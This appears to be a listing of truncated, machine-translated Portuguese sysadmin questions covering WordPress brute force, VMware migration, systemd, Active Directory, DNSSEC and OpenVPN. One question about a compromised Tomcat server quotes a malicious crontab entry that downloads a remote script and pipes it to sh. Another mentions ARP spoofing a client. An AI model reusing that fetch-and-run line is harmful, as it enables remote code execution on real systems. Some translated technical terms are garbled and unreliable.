Fui alvo de um ataque de força bruta em dois sites WordPress que possuo. O invasor está usando o bom e velho XML-RPC para amplificar o ataque de senha de força bruta. Felizmente, temos senhas extremamente bem geradas, por isso duvido que ele chegue a algum lugar. Acabei de usar o iptables para...
Planejamos migrar as VMs de produção de um de nossos datacenters, com base nos hosts ESXi 5.5, para um novo datacenter com ambiente 6.5. Os datacenters estão localizados em lugares diferentes. Portanto, nossa produção consiste em cerca de 150 VMs. Eu configurei a conexão de rede e tentei o VMware...
Estamos prestes a implantar a pesquisa de armazenamento compartilhado para armazenamento ultrarrápido para implementar o FCI (Microsoft SQL Server Failover Cluster). Até o momento, vamos começar com 500K IOPS para blocos de 8k sobre o padrão 70r / 30w. Também gostaríamos de ter a capacidade de...
Eu sei que o systemd fornece um excelente mecanismo para substituir um arquivo de unidade fornecido pelo pacote para influenciar a configuração / comportamento do serviço. Isso geralmente é feito usando o comando abaixo sudo systemctl edit <unitfile> para criar um arquivo conf de...
Eu tenho muitos hosts do Ubuntu Server 17.04 que devem ser ingressados em um domínio existente do Windows AD (Windows Server 2016). Eu nunca fiz isso antes, mas estou ciente de várias maneiras de conseguir isso, como: Igualmente, Centrify, SSSD e Winbind. Você poderia compartilhar sua...
Temos uma rede muito pequena (5 estações de trabalho) com um Windows Server atuando como controlador de domínio, servidor DHCP e DNS. Todos os dispositivos estão conectados a um switch padrão que, por sua vez, está conectado a um modem de banda larga padrão. As configurações de rede TCP para cada...
Uma organização tem suporte DNSSEC para seus domínios. Eles têm um BIND9 como servidor de nomes oficial em execução, que também gerencia as chaves. No entanto, foi decidido remover o DNSSEC. É suficiente remover o material principal /var/lib/bind/prie reiniciar o servidor ou existem etapas que...
É possível ou isso só se espalhará através de uma máquina Windows servindo por SMB? Se o Linux que serve por SMB pode espalhar o wannacrypt, qual a abordagem a ser
Aqui está um problema em um WSFC (Windows Server Failover Cluster) 2016 que hospeda uma Instância de Cluster de Failover SQL (FCI) que emprega o Storage Spaces Direct (S2D). Em cada servidor, após a criação inicial bem-sucedida, o S2D adicionou automaticamente um volume RAID não utilizado ao pool...
Eu tenho vários servidores e clientes do Windows em um laboratório de VMs e gostaria de simplificar o gerenciamento de atualizações. Atualmente, preciso executar o Windows Update em todas as máquinas, baixando as atualizações. Eu sei que com o WSUS, posso criar um cache central, mas parece que...
Temos uma montagem NFS em uma VM RHEL6 que suporta nosso servidor de controle de versão - recentemente, um dos repositórios ficou um pouco louco e foi o que encontrei no servidor: ls -latri repo.git/refs/heads/ total 28 5551210 drwxr-xr-x. 2 git git 8192 Jun 1 21:21 . 5551210 drwxr-xr-x. 2 git...
Ao executar uma guerra de projeto no servidor Apache tomcat, descobri que o servidor foi comprometido. Enquanto estiver executando a guerra em um desconhecido, cronestá executando assim [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * *...
Saí do escritório mais cedo com uma janela de terminal ativa executando um script em um servidor Centos 7. Agora eu tenho SSHing em casa e quero ver para onde ele deve chegar. Isso é possível? Posso voltar à mesma janela do terminal a partir
Estou perguntando especificamente sobre um P420 em um servidor D380p G8. Estou pensando em usar os espaços de armazenamento direto, exigindo um HBA simples. Então, eu desabilitei o RAID nos P420. Estou curioso para saber se, neste modo JBOD, o cache da placa RAID é
Estou executando um servidor OpenVPN e desejo atribuir a um cliente específico um IP estático. Este é o meu server.conf. Eu acho que isso configura o pool de IPs virtuais para abranger 10.5.24.209 a 10.5.24.223. port 443 proto tcp dev tun sndbuf 0 rcvbuf 0 ca ca.crt cert server.crt key...
então, estou tendo um cliente na minha rede conectado ao roteador através do meu computador com arpspoof. Quando eu sei que deseja parar o encaminhamento de pacotes, eu executo: iptables -A FORWARD -j REJECT está funcionando como eu esperava. Mas quando tento fazer algo como: iptables -A...
É tão estranho, eu tenho uma caixa VM centos7. Tente instalar dnfporque é uma dependência de outro pacote. A maioria das instruções na internet é assim: sudo yum install epel-release sudo yum install dnf Mas nada instala. No package dnf available Even DNF blog seguido:...
Eu tenho um aplicativo crítico que é executado como um serviço pelo systemd. Ele está configurado para reiniciar assim que houver uma falha. Como enviar um email se o aplicativo
Eu parcialmente herdei um cluster de alta disponibilidade do Linux no centro do qual atualmente serve uma conexão com DRBD 8 sobre IPoIB (IP sobre InfiniBand) entre dois hosts Debian. Não está quebrado, então não vou consertar. Também notei que o DRBD 9 suporta RDMA, portanto, pode surgir a...
A menos que todas as respostas que eu li estejam completamente erradas, o SNI deve tornar possível fazer o que quero, mas todos os guias me dizem para fazer exatamente o que estou fazendo. E, no entanto, o nginx está servindo o certificado errado, por isso estou claramente fazendo algo errado. ❯...